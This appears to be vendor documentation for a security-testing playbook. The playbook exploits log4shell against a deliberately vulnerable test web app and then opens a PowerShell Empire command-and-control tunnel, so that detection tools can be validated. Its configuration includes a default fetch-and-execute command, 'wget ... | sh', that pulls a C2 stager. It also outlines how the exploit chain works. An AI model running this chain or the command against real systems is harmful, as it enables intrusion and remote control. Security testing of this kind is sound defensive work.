DocsRelease Notes

cve_2021_44228_exploit_and_c2

Suggest Edits

The cve_2021_44228_exploit_and_c2 playbook can be used to set up the components needed to test a network security stack's ability to prevent/detect an attack against a web application vulnerable to CVE-2021-44228 (log4shell) as well as a myriad of different command and control tunnels that may result from successful exploitation of the vulnerability. The playbook uses a remote Trainman container task to create a temporary web application that is vulnerable to exploitation of CVE-2021-44228. The playbook initializes a cloud PowerShell Empire container task, a cloud Trainman container task that runs a log4shell exploit against the vulnerable web application and a cloud HTTP server container task that hosts the PowerShell Empire C2 Stager file. When the cloud Trainman container task exploits the vulnerable web application, the exploit forces the web application to download and execute the C2 Stager file from the cloud HTTP server container task. The C2 Stager then establishes a command and control tunnel with the cloud PowerShell Empire container task.

Using cloud container tasks means that Firewall exclusions would need to be made to allow the cloud Trainman container task that runs the log4shell exploit to reach the remote Trainman container task's vulnerable web application if the intent is to test and validate the capabilities of the production security stack. Given that creating the required Firewall exclusions may be an impossibility, this playbook also supports the option of using remote container tasks as the attacking tasks. In this scenario, you could position the Trainman container task that executes the exploit (the attacker) in a network segment that is allowed to reach the remote Trainman container task that is running the vulnerable web application (the target) while logically designating the attacker's network subnet as "external" in your security devices' configuration. Many network security monitoring devices provide an external designation that allows for internal subnets to be treated as external (also referred to as untrusted) networks, thus satisfying directionality requirements that may exist in the detection signatures/rules.

Requirements

Running this playbook requires the following pre-existing components:

  • A remote Trainman container task running in the monitored network to run the CVE-2021-44228 vulnerable web application.

If the playbook is to be run with remote container tasks instead of cloud container tasks, the following pre-existing components will also be required:

  • A remote PowerShell Empire container task running in an attacker's network segment to receive a C2 tunnel connection from the vulnerable web application.
  • A remote HTTP Server container task running in an attacker's network segment to host the C2 Stager file.
  • A remote Trainman container task running in an attacker's network segment to execute the exploit against the vulnerable web application.

Architecture

The architecture and workflow of this playbook when using cloud container tasks looks as follows:

1461

The architecture and workflow of this playbook when using all remote container tasks looks as follows:

1539

Configuration

To configure this playbook, use the ./havoc -c CLI option, select the number associated with the cve_2021_44228_exploit_and_c2 playbook and provide the requested details. If you're using all remote container tasks, set the use_cloud_attack_tasks parameter to False and specify task names for each of the remote tasks in the general configuration section:

$ ./havoc -c
1) c2_and_http_server                7) pse_recon_portscan
2) c2_with_ad_dc                     8) pse_recon_reverse_dns
3) cve_2021_44228_exploit_and_c2     9) pse_recon_share_finder
4) cve_2021_44228_testing           10) simple_exfil
5) pse_lateral_movement_invoke_wmi  11) windows_exfil
6) pse_recon_bloodhound             12) windows_recon
Select a playbook to install: 3
Configuring playbook cve_2021_44228_exploit_and_c2.
If you have previously configured this playbook, configuring it again will delete the existing configuration.
Are you sure you want to continue? [Y/N]: y
Creating a customized cve_2021_44228_exploit_and_c2.ini file.
Provide a value for each parameter.
Press enter without providing a value to accept the default.

[general]
use_cloud_attack_tasks [True]: <True|False>
remote_c2_task_name [None]: <remote_c2_task_name|None>
remote_http_server_task_name [None]: <remote_http_server_task_name|None>
remote_cve_2021_44228_exploit_task_name [None]: <remote_cve_2021_44228_exploit_task_name|None>

[c2_task]
listener_type [http]: <listener_type>
listener_profile [None]: <listener_profile>
listener_port [80]: <listener_port>
listener_tls [no]: <yes|no>
domain_name [None]: <domain_name|None>
cert_subj [/C=US/ST=Utah/L=Lehi/O=Your Company, Inc./OU=IT/CN=$HOST]: <cert_subj>
stager_file [http_profile.sh]: <stager_file_name>

[http_server_task]
http_port [80]: <http_port>
ssl [False]: <Ture|False>
domain_name [None]: <domain_name|None>

[cve_2021_44228_exploit_task]
http_port [80]: <http_port>
ldap_port [1389]: <ldap_port>
domain_name [None]: <domain_name|None>
exec_cmd [wget -O - http://$HTTP_SERVER_TASK/$STAGER_FILE | sh]: <command_to_execute>

[remote_cve_2021_44228_app_task]
task_name [remote_trainman_cve_2021_44228_app]: <remote_cve_2021_44228_app_task_name>
java_version [[email protected]]: <java_version>
target_port [80]: <target_port>

<snip - installing required Python modules>

Playbook cve_2021_44228_exploit_and_c2 configured.
$

Execution

To execute this playbook, run the following ./havoc CLI command (where is replaced with the ./havoc config profile name that you would like to authenticate to the ./havoc API with):

$ ./havoc -e cve_2021_44228_exploit_and_c2 <profile>

Clean up

Error handling
If the playbook encounters errors during execution, it should automatically switch to a clean_up function and delete any resources that it created. If the playbook is hung on a specific task, you can press Ctrl+C to terminate the playbook and initiate the clean_up function.

Successful execution
After the playbook executes all operations successfully it will pause itself and leave all corresponding resources in place so that you can utilize its components with other playbooks such as the windows_recon playbook. When you're finished running the desired activities with the components from this playbook, pressing the "enter" key at the paused prompt will initiate the playbook's clean_up function.

Associated resources
This playbook creates and destroys the following resources:

  • A PowerShell Empire cloud container task.
    • A PowerShell Empire Listener.
    • A PowerShell Empire Stager file that gets saved to the local directory where ./havoc CLI was executed from.
  • A portgroup that restricts inbound access to the PowerShell Empire's Listener port to just the public IP address of the remote Trainman container task that will be running the vulnerable web application.
  • A shared Workspace file that is a copy of the PowerShell Empire Stager file.
  • A cloud HTTP Server container task.
  • A portgroup that restricts inbound access to the HTTP Server container task's HTTP Server port to just the public IP address of the remote Trainman container task that will be running the vulnerable web application.
  • A cloud Trainman container Task that executes the log4shell exploit.
  • A portgroup that restricts inbound access to the Trainman container task's HTTP and LDAP ports to just the public IP address of the remote Trainman container task that will be running the vulnerable web application.

If you're uncertain whether the clean_up function completed successfully, the following ./havoc CLI console commands can be used to check which resources are still present:
list_tasks
list_portgroups
list_files

Updated 7 months ago